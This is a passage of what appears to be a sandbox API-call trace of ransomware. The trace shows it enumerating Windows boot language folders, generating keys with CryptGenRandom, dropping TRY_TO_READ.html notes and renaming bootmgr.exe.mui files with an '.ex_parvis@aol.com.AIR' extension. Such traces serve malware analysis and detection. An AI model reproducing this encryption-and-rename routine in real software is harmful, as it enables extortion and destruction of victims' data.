(lpString="C:\\\\Boot\\pl-PL\\bootmgr.exe.mui") returned 30 [0116.623] GetProcessHeap () returned 0x2e0000 [0116.623] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa2) returned 0x344ca0 [0116.623] lstrcpyW (in: lpString1=0x344ca0, lpString2="C:\\\\Boot\\pl-PL\\bootmgr.exe.mui" | out: lpString1="C:\\\\Boot\\pl-PL\\bootmgr.exe.mui") returned="C:\\\\Boot\\pl-PL\\bootmgr.exe.mui" [0116.623] lstrcatW (in: lpString1="C:\\\\Boot\\pl-PL\\bootmgr.exe.mui", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\pl-PL\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\pl-PL\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" [0116.623] MoveFileExW (lpExistingFileName="C:\\\\Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\pl-PL\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0 [0116.624] CreateFileW (lpFileName="C:\\\\Boot\\pl-PL\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0116.624] GetProcessHeap () returned 0x2e0000 [0116.624] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344ca0 | out: hHeap=0x2e0000) returned 1 [0116.624] CloseHandle (hObject=0xffffffff) returned 0 [0116.624] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324128 | out: hHeap=0x2e0000) returned 1 [0116.624] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3241b8 | out: hHeap=0x2e0000) returned 1 [0116.624] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.624] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0116.624] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e558 | out: hHeap=0x2e0000) returned 1 [0116.624] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e580 | out: hHeap=0x2e0000) returned 1 [0116.624] FindFirstFileW (in: lpFileName="C:\\\\Boot\\pt-BR\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x9702dc90, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x9702dc90, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x35da98 [0116.624] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.624] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.624] GetLastError () returned 0x6 [0116.624] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0116.624] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324bf0 [0116.624] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324bf0 | out: hHeap=0x2e0000) returned 1 [0116.624] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e558 [0116.624] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x35dad8 [0116.624] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x35dad8 | out: hHeap=0x2e0000) returned 1 [0116.624] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.624] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.624] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e558 | out: hHeap=0x2e0000) returned 1 [0116.624] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0116.624] FindNextFileW (in: hFindFile=0x35da98, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x9702dc90, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x9702dc90, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.625] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.625] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.625] GetLastError () returned 0x6 [0116.625] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0116.625] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324bf0 [0116.625] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324bf0 | out: hHeap=0x2e0000) returned 1 [0116.625] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e558 [0116.625] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x35dad8 [0116.625] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x35dad8 | out: hHeap=0x2e0000) returned 1 [0116.625] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.625] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.625] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e558 | out: hHeap=0x2e0000) returned 1 [0116.625] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0116.625] FindNextFileW (in: hFindFile=0x35da98, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0116.625] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.625] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.625] GetLastError () returned 0x6 [0116.625] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e558 [0116.625] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0116.625] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3241b8 [0116.625] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3241b8 | out: hHeap=0x2e0000) returned 1 [0116.625] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0116.625] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e558 | out: hHeap=0x2e0000) returned 1 [0116.625] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3241b8 [0116.625] FindNextFileW (in: hFindFile=0x35da98, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9702dc90, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x9702dc90, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x9702dc90, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0116.625] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.625] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.625] GetLastError () returned 0x6 [0116.625] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0116.625] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446f8 [0116.625] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324128 [0116.625] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324128 | out: hHeap=0x2e0000) returned 1 [0116.625] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446f8 | out: hHeap=0x2e0000) returned 1 [0116.625] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0116.625] FindNextFileW (in: hFindFile=0x35da98, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9702dc90, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x9702dc90, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x9702dc90, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0116.626] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324128 [0116.626] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x362ad8 [0116.626] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330bb8 [0116.626] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x362ad8 | out: pbBuffer=0x362ad8) returned 1 [0116.626] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x330bb8 | out: pbBuffer=0x330bb8) returned 1 [0116.626] SetFileAttributesW (lpFileName="C:\\\\Boot\\pt-BR\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0116.626] lstrlenW (lpString="C:\\\\Boot\\pt-BR\\bootmgr.exe.mui") returned 30 [0116.626] GetProcessHeap () returned 0x2e0000 [0116.626] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa2) returned 0x344ca0 [0116.626] lstrcpyW (in: lpString1=0x344ca0, lpString2="C:\\\\Boot\\pt-BR\\bootmgr.exe.mui" | out: lpString1="C:\\\\Boot\\pt-BR\\bootmgr.exe.mui") returned="C:\\\\Boot\\pt-BR\\bootmgr.exe.mui" [0116.626] lstrcatW (in: lpString1="C:\\\\Boot\\pt-BR\\bootmgr.exe.mui", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\pt-BR\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\pt-BR\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" [0116.626] MoveFileExW (lpExistingFileName="C:\\\\Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\pt-BR\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0 [0116.626] CreateFileW (lpFileName="C:\\\\Boot\\pt-BR\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0116.626] GetProcessHeap () returned 0x2e0000 [0116.626] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344ca0 | out: hHeap=0x2e0000) returned 1 [0116.626] CloseHandle (hObject=0xffffffff) returned 0 [0116.626] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324128 | out: hHeap=0x2e0000) returned 1 [0116.626] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3241b8 | out: hHeap=0x2e0000) returned 1 [0116.626] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0116.626] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.626] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e5a8 | out: hHeap=0x2e0000) returned 1 [0116.626] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e5d0 | out: hHeap=0x2e0000) returned 1 [0116.626] FindFirstFileW (in: lpFileName="C:\\\\Boot\\pt-PT\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x9702dc90, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x9702dc90, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x35dad8 [0116.627] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.627] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.627] GetLastError () returned 0x6 [0116.627] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.627] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324bf0 [0116.627] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324bf0 | out: hHeap=0x2e0000) returned 1 [0116.627] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e5a8 [0116.627] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x35db18 [0116.627] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x35db18 | out: hHeap=0x2e0000) returned 1 [0116.627] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.627] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.627] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e5a8 | out: hHeap=0x2e0000) returned 1 [0116.627] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.627] FindNextFileW (in: hFindFile=0x35dad8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x9702dc90, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x9702dc90, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.627] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.627] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.627] GetLastError () returned 0x6 [0116.627] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.627] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324bf0 [0116.627] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324bf0 | out: hHeap=0x2e0000) returned 1 [0116.627] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e5a8 [0116.627] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x35db18 [0116.627] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x35db18 | out: hHeap=0x2e0000) returned 1 [0116.627] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.627] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.627] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e5a8 | out: hHeap=0x2e0000) returned 1 [0116.627] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.627] FindNextFileW (in: hFindFile=0x35dad8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0116.627] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.627] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.627] GetLastError () returned 0x6 [0116.627] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e5a8 [0116.627] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.628] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3241b8 [0116.628] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3241b8 | out: hHeap=0x2e0000) returned 1 [0116.628] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.628] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e5a8 | out: hHeap=0x2e0000) returned 1 [0116.628] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3241b8 [0116.628] FindNextFileW (in: hFindFile=0x35dad8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9702dc90, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x9702dc90, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x9702dc90, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0116.628] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.628] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.628] GetLastError () returned 0x6 [0116.628] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.628] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446f8 [0116.628] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324128 [0116.628] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324128 | out: hHeap=0x2e0000) returned 1 [0116.628] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446f8 | out: hHeap=0x2e0000) returned 1 [0116.628] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.628] FindNextFileW (in: hFindFile=0x35dad8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9702dc90, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x9702dc90, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x9702dc90, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0116.628] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324128 [0116.628] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x362be0 [0116.628] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330bc8 [0116.628] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x362be0 | out: pbBuffer=0x362be0) returned 1 [0116.628] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x330bc8 | out: pbBuffer=0x330bc8) returned 1 [0116.628] SetFileAttributesW (lpFileName="C:\\\\Boot\\pt-PT\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0116.628] lstrlenW (lpString="C:\\\\Boot\\pt-PT\\bootmgr.exe.mui") returned 30 [0116.628] GetProcessHeap () returned 0x2e0000 [0116.628] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa2) returned 0x344ca0 [0116.628] lstrcpyW (in: lpString1=0x344ca0, lpString2="C:\\\\Boot\\pt-PT\\bootmgr.exe.mui" | out: lpString1="C:\\\\Boot\\pt-PT\\bootmgr.exe.mui") returned="C:\\\\Boot\\pt-PT\\bootmgr.exe.mui" [0116.628] lstrcatW (in: lpString1="C:\\\\Boot\\pt-PT\\bootmgr.exe.mui", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\pt-PT\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\pt-PT\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" [0116.628] MoveFileExW (lpExistingFileName="C:\\\\Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\pt-PT\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0 [0116.629] CreateFileW (lpFileName="C:\\\\Boot\\pt-PT\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0116.629] GetProcessHeap () returned 0x2e0000 [0116.629] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344ca0 | out: hHeap=0x2e0000) returned 1 [0116.629] CloseHandle (hObject=0xffffffff) returned 0 [0116.629] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324128 | out: hHeap=0x2e0000) returned 1 [0116.629] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3241b8 | out: hHeap=0x2e0000) returned 1 [0116.629] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.629] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0116.629] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e5f8 | out: hHeap=0x2e0000) returned 1 [0116.629] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e620 | out: hHeap=0x2e0000) returned 1 [0116.629] FindFirstFileW (in: lpFileName="C:\\\\Boot\\ru-RU\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x9702dc90, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x9702dc90, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x35db18 [0116.629] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.629] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.629] GetLastError () returned 0x6 [0116.629] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0116.629] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324bf0 [0116.629] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324bf0 | out: hHeap=0x2e0000) returned 1 [0116.629] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e5f8 [0116.629] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x35db58 [0116.629] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x35db58 | out: hHeap=0x2e0000) returned 1 [0116.629] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.629] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.629] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e5f8 | out: hHeap=0x2e0000) returned 1 [0116.629] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0116.629] FindNextFileW (in: hFindFile=0x35db18, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x9702dc90, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x9702dc90, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.629] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.629] RtlAllocateHeap 